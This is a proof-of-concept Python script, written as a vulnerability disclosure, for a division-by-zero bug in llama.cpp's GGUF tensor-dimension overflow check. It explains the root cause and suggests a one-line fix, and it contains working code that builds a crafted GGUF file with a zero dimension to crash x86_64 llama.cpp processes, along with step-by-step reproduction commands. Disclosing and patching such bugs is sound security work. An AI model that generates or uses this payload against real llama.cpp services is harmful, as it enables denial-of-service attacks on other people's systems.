"""
PoC: llama.cpp GGUF Division-by-Zero (UB / SIGFPE) via crafted tensor dimensions
================================================================================

Vulnerability: Division by zero in gguf.cpp tensor dimension overflow check.

Location: llama.cpp/ggml/src/gguf.cpp, lines 632-634

Root Cause:
    Line 623 validates tensor dimensions with:
        if (info.t.ne[j] < 0)
    This rejects negative values but allows ne[j] == 0.

    Lines 632-634 then perform:
        INT64_MAX/info.t.ne[1]
        INT64_MAX/info.t.ne[2]
        INT64_MAX/info.t.ne[3]
    without checking for zero. When any of ne[1], ne[2], or ne[3] is zero
    (for a tensor with n_dims >= 2), this triggers undefined behavior via
    integer division by zero.

Impact:
    Any application using llama.cpp that loads a user-supplied GGUF file
    (e.g., llama-cli, llama-server, any third-party app using
    gguf_init_from_file) invokes undefined behavior. The concrete effect
    depends on the platform:

    - x86/x86_64: Integer division by zero raises SIGFPE, crashing the
      process. This is the most common deployment platform for llama.cpp
      servers.
    - aarch64/ARM: The SDIV instruction returns 0 for division by zero (no
      trap). The UB is silently "swallowed" but the behavior is still
      formally undefined per the C/C++ standard, and compilers may exploit
      the UB for optimization (e.g., eliminating the entire check, leading
      to further downstream issues).

    On x86_64, this is a reliable denial-of-service: any llama.cpp-based
    service that accepts user-uploaded GGUF model files can be crashed with
    a single 128-byte malicious file.

CVSS: Medium (denial of service via crafted input file)

Affected code (gguf.cpp lines 622-641):

    // check that all ne are non-negative
    if (info.t.ne[j] < 0) {             // BUG: allows ne[j] == 0
        ...
    }

    // check that the total number of elements is representable
    if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) ||  // divides by ne[1]
               (INT64_MAX/info.t.ne[2] <= ...) ||           // divides by ne[2]
               (INT64_MAX/info.t.ne[3] <= ...))) {          // divides by ne[3]
        ...
    }

Suggested Fix (one-line change at line 623):

    The cleanest fix is to reject zero-valued dimensions, since a tensor
    with zero elements in any dimension is degenerate/invalid:

        // change line 623 from < to <=
        - if (info.t.ne[j] < 0) {
        + if (info.t.ne[j] <= 0) {

    This rejects zero-element dimensions entirely, preventing the division
    by zero and also preventing degenerate tensors from entering the system.

    Alternatively, guard the division directly:

        - if (ok && ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) ||
        + if (ok && info.t.ne[1] != 0 && info.t.ne[2] != 0 && info.t.ne[3] != 0 &&
        +     ((INT64_MAX/info.t.ne[1] <= info.t.ne[0]) ||
"""
|
|
import os
import struct
import sys
|
|
|
|
def build_gguf_string(s: str) -> bytes:
    """Serialize *s* in GGUF string form.

    A GGUF string is a little-endian uint64 byte length followed by the
    raw UTF-8 bytes, with no null terminator.
    """
    raw = s.encode("utf-8")
    length_prefix = struct.pack("<Q", len(raw))
    return length_prefix + raw
|
|
|
|
def build_malicious_gguf() -> bytes:
    """Return a minimal GGUF v3 file with one tensor whose ne[1] == 0.

    Loading the result triggers the division by zero in the overflow check
    in gguf.cpp (INT64_MAX / ne[1]).

    GGUF binary layout (little-endian):
      1. magic "GGUF" (4 ASCII bytes)
      2. version: uint32 (= 3)
      3. n_tensors: int64
      4. n_kv: int64 (we emit zero key-value pairs)
      5. per-tensor info: name (uint64 length + UTF-8 bytes), n_dims uint32
         (max GGML_MAX_DIMS = 4), ne[0..n_dims-1] as int64 each (dimensions
         n_dims..3 are implicitly 1), type uint32, offset uint64
      6. zero padding up to GGUF_DEFAULT_ALIGNMENT (32 bytes)
      7. tensor data section
    """
    # Tensor name encoded inline in GGUF string form (uint64 length + bytes).
    name = b"evil_tensor"

    header = b"".join([
        b"GGUF",                              # magic
        struct.pack("<I", 3),                 # version 3
        struct.pack("<q", 1),                 # n_tensors = 1
        struct.pack("<q", 0),                 # n_kv = 0 (no metadata)
        struct.pack("<Q", len(name)), name,   # tensor name
        struct.pack("<I", 2),                 # n_dims = 2
        struct.pack("<q", 1),                 # ne[0] = 1
        struct.pack("<q", 0),                 # ne[1] = 0 -> INT64_MAX / 0
        struct.pack("<I", 0),                 # ggml type enum value
        struct.pack("<Q", 0),                 # offset into data section
    ])

    # Pad the header to the default 32-byte alignment boundary, then append
    # one alignment-sized block of zeroed "tensor data".
    alignment = 32
    padding = (-len(header)) % alignment
    return header + b"\x00" * (padding + alignment)
|
|
|
|
def main() -> None:
    """Write the PoC GGUF file and print reproduction instructions.

    An optional first command-line argument overrides the default output
    filename.
    """
    target = sys.argv[1] if len(sys.argv) > 1 else "malicious_div_zero.gguf"

    payload = build_malicious_gguf()
    with open(target, "wb") as fh:
        fh.write(payload)

    size = os.path.getsize(target)
    banner = "=" * 70

    # Assemble the whole report and emit it in one call; the output is
    # byte-identical to printing each line separately.
    report = [
        f"[+] Wrote malicious GGUF file: {target} ({size} bytes)",
        "",
        banner,
        "VULNERABILITY: Integer Division by Zero (UB) in GGUF Tensor Parsing",
        banner,
        "",
        "File: ggml/src/gguf.cpp, lines 632-634",
        "Bug: Division by ne[1] (= 0) in overflow check",
        "Trigger: Tensor with n_dims=2, ne[0]=1, ne[1]=0",
        "Type: CWE-369 (Divide By Zero)",
        "",
        "--- How to Reproduce ---",
        "",
        "1. Build llama.cpp (on x86_64 for guaranteed SIGFPE crash):",
        "",
        " git clone https://github.com/ggerganov/llama.cpp",
        " cd llama.cpp",
        " cmake -B build -DCMAKE_BUILD_TYPE=Release",
        " cmake --build build -j$(nproc)",
        "",
        "2. Run with the malicious file:",
        "",
        f" ./build/bin/llama-cli -m {target}",
        "",
        " Or any program that calls gguf_init_from_file().",
        "",
        "3. Expected result (x86_64):",
        "",
        " The process is killed by SIGFPE (signal 8) due to integer",
        " division by zero in the tensor element count overflow check.",
        " The crash occurs during GGUF header parsing, before any model",
        " weights are loaded.",
        "",
        " NOTE: On aarch64/ARM, the hardware does not trap on integer",
        " division by zero (SDIV returns 0). The behavior is still",
        " undefined per the C/C++ standard and the compiler may exploit",
        " the UB in unpredictable ways, but a hardware crash will not",
        " occur. The primary impact is on x86_64 deployments.",
        "",
        "--- Suggested Fix (one-line change) ---",
        "",
        "In ggml/src/gguf.cpp, line 623, change the validation from",
        "strictly-less-than to less-than-or-equal:",
        "",
        " - if (info.t.ne[j] < 0) {",
        " + if (info.t.ne[j] <= 0) {",
        "",
        "This rejects zero-valued dimensions at the validation stage,",
        "before they can reach the division. A tensor with zero elements",
        "in any dimension is degenerate and should be rejected anyway.",
    ]
    print("\n".join(report))
|
|
|
# Script entry point: generate the PoC file when executed directly
# (not when imported as a module).
if __name__ == "__main__":
    main()
|
|